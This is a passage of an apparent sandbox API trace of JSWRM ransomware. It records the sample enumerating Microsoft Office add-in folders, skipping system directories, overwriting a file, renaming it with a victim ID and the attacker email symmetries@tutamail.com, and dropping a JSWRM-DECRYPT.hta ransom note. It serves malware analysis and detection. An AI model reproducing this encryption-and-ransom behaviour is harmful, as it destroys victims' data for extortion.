returned -1 [0124.317] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0124.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0124.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0124.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d578, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0124.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d770, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.317] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x14969496, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x14969496, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14a01eaa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f0e0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.it.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0124.317] lstrcmpiW (lpString1="PowerViewRes.it.xap", lpString2=".") returned 1 [0124.317] lstrcmpiW (lpString1="PowerViewRes.it.xap", lpString2="..") returned 1 [0124.317] lstrcmpiW (lpString1="PowerViewRes.it.xap", lpString2="...") returned 1 [0124.317] lstrcmpiW (lpString1="PowerViewRes.it.xap", lpString2="windows") returned -1 [0124.317] lstrcmpiW (lpString1="PowerViewRes.it.xap", lpString2="recovery") returned -1 [0124.317] lstrcmpiW (lpString1="PowerViewRes.it.xap", lpString2="perflogs") returned 1 [0124.317] lstrcmpiW (lpString1="PowerViewRes.it.xap", lpString2="documents and settings") returned 1 [0124.317] lstrcmpiW (lpString1="PowerViewRes.it.xap", lpString2="$RECYCLE.BIN") returned 1 [0124.317] lstrcmpiW (lpString1="PowerViewRes.it.xap", lpString2="system volume information") returned -1 [0124.317] lstrcmpiW (lpString1="PowerViewRes.it.xap", lpString2="msocache") returned 1 [0124.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.it.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0124.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.it.xap", cchWideChar=19, lpMultiByteStr=0x241290, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.it.xap", lpUsedDefaultChar=0x0) returned 19 [0124.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.it.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0124.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.it.xap", cchWideChar=19, lpMultiByteStr=0x240f70, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.it.xap", lpUsedDefaultChar=0x0) returned 19 [0124.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0124.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\it\\PowerViewRes.it.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\it\\powerviewres.it.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0124.318] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=323808) returned 1 [0124.318] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0124.318] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0124.349] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.349] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0124.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0124.349] CloseHandle (hObject=0x338) returned 1 [0124.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0124.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0124.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0124.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0124.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0124.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0124.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0124.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0124.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0124.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0124.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.350] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\it\\PowerViewRes.it.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\it\\powerviewres.it.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\it\\PowerViewRes.it.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\it\\powerviewres.it.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0124.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0124.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0124.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0124.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0124.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0124.351] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x14969496, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x14969496, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14a01eaa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f0e0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.it.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0124.351] FindClose (in: hFindFile=0x232140 | out: hFindFile=0x232140) returned 1 [0124.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0124.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0124.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0124.352] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf15d84bd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x146e0bdc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x146e0bdc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="ja", cAlternateFileName="")) returned 1 [0124.352] lstrcmpiW (lpString1="ja", lpString2=".") returned 1 [0124.352] lstrcmpiW (lpString1="ja", lpString2="..") returned 1 [0124.352] lstrcmpiW (lpString1="ja", lpString2="...") returned 1 [0124.352] lstrcmpiW (lpString1="ja", lpString2="windows") returned -1 [0124.352] lstrcmpiW (lpString1="ja", lpString2="recovery") returned -1 [0124.352] lstrcmpiW (lpString1="ja", lpString2="perflogs") returned -1 [0124.352] lstrcmpiW (lpString1="ja", lpString2="documents and settings") returned 1 [0124.352] lstrcmpiW (lpString1="ja", lpString2="$RECYCLE.BIN") returned 1 [0124.353] lstrcmpiW (lpString1="ja", lpString2="system volume information") returned -1 [0124.353] lstrcmpiW (lpString1="ja", lpString2="msocache") returned -1 [0124.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0124.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0124.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0124.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0124.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0124.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0124.353] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ja\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ja\\jswrm-decrypt.hta")) returned 0xffffffff [0124.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0124.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0124.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0124.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0124.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0124.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0124.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0124.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0124.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0124.355] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ja\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ja\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0124.357] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.357] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0124.358] CloseHandle (hObject=0x314) returned 1 [0124.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0124.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0124.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0124.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0124.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0124.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0124.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0124.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0124.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0124.359] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ja\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ja\\jswrm-decrypt.hta")) returned 0x20 [0124.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0124.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0124.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0124.359] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ja\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf15d84bd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x146e0bdc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40c7880a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232180 [0124.359] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0124.359] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf15d84bd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x146e0bdc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40c7880a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0124.359] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0124.359] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0124.359] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf15d84bd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf15d84bd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1498f816, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc1c40, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0124.359] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0124.359] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0124.359] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0124.359] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0124.359] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0124.359] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0124.359] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0124.359] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.359] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0124.359] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0124.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0124.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2411c8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0124.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0124.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0124.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0124.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0124.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0124.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0124.360] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40c7880a, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x40c7880a, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x40c9ea6f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0124.360] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0124.360] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0124.360] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0124.360] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0124.360] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0124.360] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0124.360] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0124.360] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0124.360] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0124.360] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0124.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0124.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0124.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0124.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0124.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0124.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0124.361] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4ba375b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4ba375b, 